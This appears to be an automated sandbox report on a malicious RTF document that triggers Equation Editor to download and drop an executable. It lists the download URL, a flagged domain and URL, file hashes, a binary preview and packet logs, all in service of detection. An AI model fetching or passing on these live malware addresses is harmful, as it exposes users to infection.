• Number of executed functions: 158
• Number of non-executed functions: 60
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .rtf
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/321301/sample/fqwBU8MyzT.rtf

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

Time      Type             Description
20:04:44  API Interceptor  372x Sleep call for process: EQNEDT32.EXE modified
20:04:47  API Interceptor  17x Sleep call for process: vbc.exe modified
20:04:49  API Interceptor  91x Sleep call for process: RegSvcs.exe modified
20:05:11  API Interceptor  107x Sleep call for process: wlanext.exe modified
20:06:11  API Interceptor  1x Sleep call for process: explorer.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

Match            Associated Sample Name / URL  Detection  Context
146.148.194.209  104500.exe                    malicious
  • www.sgbanfang.com/glt/?T8kx=Jg/IIDFtDxc1kv0Qq0w5JS6M3VwEeM8XBZYNtdJs4K7ttfye2u9lQqIc4IuJQgd+A3Op&Tzu8=7n1tZr

                                                                                                                                                      Domains

Match: www.sgbanfang.com
Associated Sample Name / URL: 104500.exe
Detection: malicious
Context:
• 146.148.194.209

                                                                                                                                                      ASN


                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 711168
Entropy (8bit): 7.6186010890207205
Encrypted: false
SSDEEP: 12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
MD5: BB30A5DD4130B071FB4CA5F005371C63
SHA1: 52C3CA02828A4AD8E8DBF790A61B3D77379AD391
SHA-256: 4C73FD4286E76A094EEFAFE5369F3A184CA4A38D567AE6DFAD61645BF968A83F
SHA-512: 062F184DEA6B1327418B7030B114CC40BF21072408FB9408BC18B823BCE73534CF513A566EF16F90C0379581FB9E189D8D39614334C04C1607AFBC02089AC0D1
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 35%
Reputation: low
IE Cache URL: http://103.207.38.170/pp.exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B7CA7515-A895-478C-8EF6-6349A27B2C7C}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 11264
Entropy (8bit): 3.622478034078107
Encrypted: false
SSDEEP: 192:5+LEwpnggZNIocJk3tmmaHh5VZS4F8CFrhGE4AI4UmoKviXJyLWNq2zacJ9:woTmcJktCPVZ3POzP8dveq2zNJ9
MD5: D6338D9D8D3514DEC974E4A251100FC0
SHA1: F558F5201CA0F7F0B58A7F87CEB4DE79A2B63A4C
SHA-256: 1C0DB48641768E21B5F63F4ED1D09F685134F91BC53E6169F44A94F5A3752881
SHA-512: F66521FD00F06CE37DF0C958BDDE96EBB065F7A8A98F9495E09A2D1A6D0DE3F546D8C81FAB5543E93E4DCC5816B96A5C747EA4EFF72EF5C79C7A425FBC60FFEC
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD501063-4E04-4856-9DA8-291722E1F767}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\fqwBU8MyzT.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:20 2020, mtime=Wed Aug 26 14:08:20 2020, atime=Sat Nov 21 03:04:42 2020, length=10024, window=hide
Category: dropped
Size (bytes): 2028
Entropy (8bit): 4.557886614404819
Encrypted: false
SSDEEP: 24:8oB/XT46kd2zvqZe+roDv3qc4dM7dD2oB/XT46kd2zvqZe+roDv3qc4dM7dV:8oB/XTDkd2zc1fQh2oB/XTDkd2zc1fQ/
MD5: E9735FC12377B7C04AB0CFB38ACA282C
SHA1: 6F6A66E8CD8A5F0F960654D1A9450E6F27C427B6
SHA-256: 289CD7F82404F1F2CC9C08FC7B84A10A65344102E08DEDDAD67D2E33E9C675EE
                                                                                                                                                      SHA-512:FECE57AB6D01AE3DBF5E43E47ACA2A41D22B218FCA50BCAE0C28A70C3F5381B8E5DC379101FC76079A326DB60CEA66203A9781A92A20B5A51C6829B13B6BE43C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: L..................F.... ....Pd..{...Pd..{...rp....('...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.('..uQ. .FQWBU8~1.RTF..J.......Q.y.Q.y*...8.....................f.q.w.B.U.8.M.y.z.T...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\fqwBU8MyzT.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.f.q.w.B.U.8.M.y.z.T...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):70
                                                                                                                                                      Entropy (8bit):4.53931900289512
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:HIUpnfNpzCbTwnfNpzCmxWIUpnfNpzCv:HpVNp+MNpqVNpI
                                                                                                                                                      MD5:B497E87D82221936A428D7E2E1009F13
                                                                                                                                                      SHA1:FE5FB05D98A16AD8007A4EA2EAC07CF40BD7C1E4
                                                                                                                                                      SHA-256:323E4670339317BDFA8ABAE5C0E9FDC09FBA1F69D3FBAFD6C65C3B827AB701FB
                                                                                                                                                      SHA-512:A980FB76728497CDD561C7D91FBCE6BF18CB21F20A365D6C0BDD671E2C9AAA6B788D203C2D39D189C9FC54CF0A6503EB4AB1284B61776123D14EBF6B2AB015FE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [misc]..fqwBU8MyzT.LNK=0..fqwBU8MyzT.LNK=0..[misc]..fqwBU8MyzT.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                                                                                      MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                                                                                      SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                                                                                      SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                                                                                      SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                                                                                      C:\Users\user\Desktop\~$wBU8MyzT.rtf
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                                                                                      MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                                                                                      SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                                                                                      SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                                                                                      SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):711168
                                                                                                                                                      Entropy (8bit):7.6186010890207205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
                                                                                                                                                      MD5:BB30A5DD4130B071FB4CA5F005371C63
                                                                                                                                                      SHA1:52C3CA02828A4AD8E8DBF790A61B3D77379AD391
                                                                                                                                                      SHA-256:4C73FD4286E76A094EEFAFE5369F3A184CA4A38D567AE6DFAD61645BF968A83F
                                                                                                                                                      SHA-512:062F184DEA6B1327418B7030B114CC40BF21072408FB9408BC18B823BCE73534CF513A566EF16F90C0379581FB9E189D8D39614334C04C1607AFBC02089AC0D1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'._..............P.............n.... ........@.. ....................... ............@.....................................O....... ............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................P.......H.......P................................................................0..........*....0............(....(..........(.....(.....*..................0.............(.... ... 99H.a%..^E........A.......t.......[...)...+r.. kx\RZ F.<.a+...(...... ....Z J..ra+....( ..... y.Z.Z Y.@a+...(!..... ..4.Z ..3.a8z.....(".... ...Z ...Ia8a...*....0..D........ f7.i Y.~.a%..^E....!...........+..(....o....(#.... ....Z ].ha+..*.0...........($...*..0............o%...*.0............(&...*.0..

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Rich Text Format data, unknown version
                                                                                                                                                      Entropy (8bit):5.500483643483778
                                                                                                                                                      TrID:
                                                                                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                                                                                      File name:fqwBU8MyzT.rtf
                                                                                                                                                      File size:10024
                                                                                                                                                      MD5:b115f24fcecce5e8661300527a748448
                                                                                                                                                      SHA1:9673703628a2edf4fea0b3a764357f82b4c9ce9f
                                                                                                                                                      SHA256:15655af972b632964f3327334c8809fb6cd6cd04e43f4548a32a5bb5743a75bc
                                                                                                                                                      SHA512:981c6e16ef59a337a1375367a048e63c877550137e01b7854356355c1f876c3118d606adeb33b0a047645b7eeb3806ed0a72aed5a36d7b7be4699ce23c5818ed
                                                                                                                                                      SSDEEP:192:txo49xa9Dj4BAQBR6qz0EW1qTGBGuJZzugM2U3Ucvm1Af++ldIbZ:txoX9DsBAQBR1zaqT0GumxQcuaW+ldK
                                                                                                                                                      File Content Preview:{\rtf4435#._).+2^.*'.9^1;.+%?+`(,~;00?/!1[6;?+<[.??)@)4(3?4(.?#81['4>88];`1'*.?/&%+)?];.+=^4..8%#3/6;[)$595#8]^$-[477,%??#2.:3??_?3.5?^$]=_#~$*3/'??#@?^$(?(._,?@!(]@,?.'.,6?<>_=%<;+7)[&<=2>3./?2!'.>%50)2773=%6)-.:$`+3~_#0,&0-2)?.)?,=%.>*^+0>?5<916?`9.?>:?

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                                      Static RTF Info

                                                                                                                                                      Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 0000145Eh | | | | | | | | no

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      Nov 20, 2020 20:04:33.196902037 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196903944 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196985960 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.197880983 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.414916992 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414956093 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414975882 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414995909 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415016890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415043116 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415071964 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415098906 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415124893 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415152073 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415178061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415199995 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415225983 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415230989 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415251970 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415265083 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415277958 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415303946 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415323973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415330887 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415344954 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415358067 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415365934 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415385962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415404081 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415421009 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415437937 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415441990 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415456057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415457964 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415474892 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415478945 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415496111 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415515900 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415534973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415549994 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415551901 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415561914 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415570974 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415577888 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415589094 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415607929 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415607929 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415626049 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415652037 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415652037 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415673018 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415690899 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415704012 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415724993 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415734053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415957928 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415977955 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415996075 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.416014910 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.416065931 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.416095018 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.417428970 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.633999109 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634046078 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634068012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634074926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634088993 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634114981 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634144068 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634147882 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634170055 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634192944 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634198904 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634210110 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634213924 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634236097 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634255886 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634275913 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634283066 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634310961 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634327888 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634331942 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634354115 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634372950 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634378910 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634382963 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634414911 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634475946 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.635368109 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.636917114 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.636941910 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.636962891 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.636982918 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.636997938 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637006044 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637028933 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637032032 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637056112 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637073040 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637075901 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637099028 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637101889 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637120008 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637124062 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637140989 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637150049 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637164116 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637176037 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637186050 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637212038 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637219906 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637236118 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637236118 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637257099 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637276888 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637288094 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637295008 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637298107 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637319088 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637337923 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637341022 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637362957 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637375116 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637409925 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637429953 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637444973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637458086 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078778982 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078828096 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078840971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078871965 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078887939 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078911066 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078936100 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078949928 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.078958035 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078983068 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.078989983 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079029083 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079041958 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079067945 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079099894 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079107046 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079116106 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079154968 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079190969 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079199076 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079207897 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079237938 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079252005 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079277039 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079293013 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079314947 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079339027 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079354048 CET8049165103.207.38.170192.168.2.22
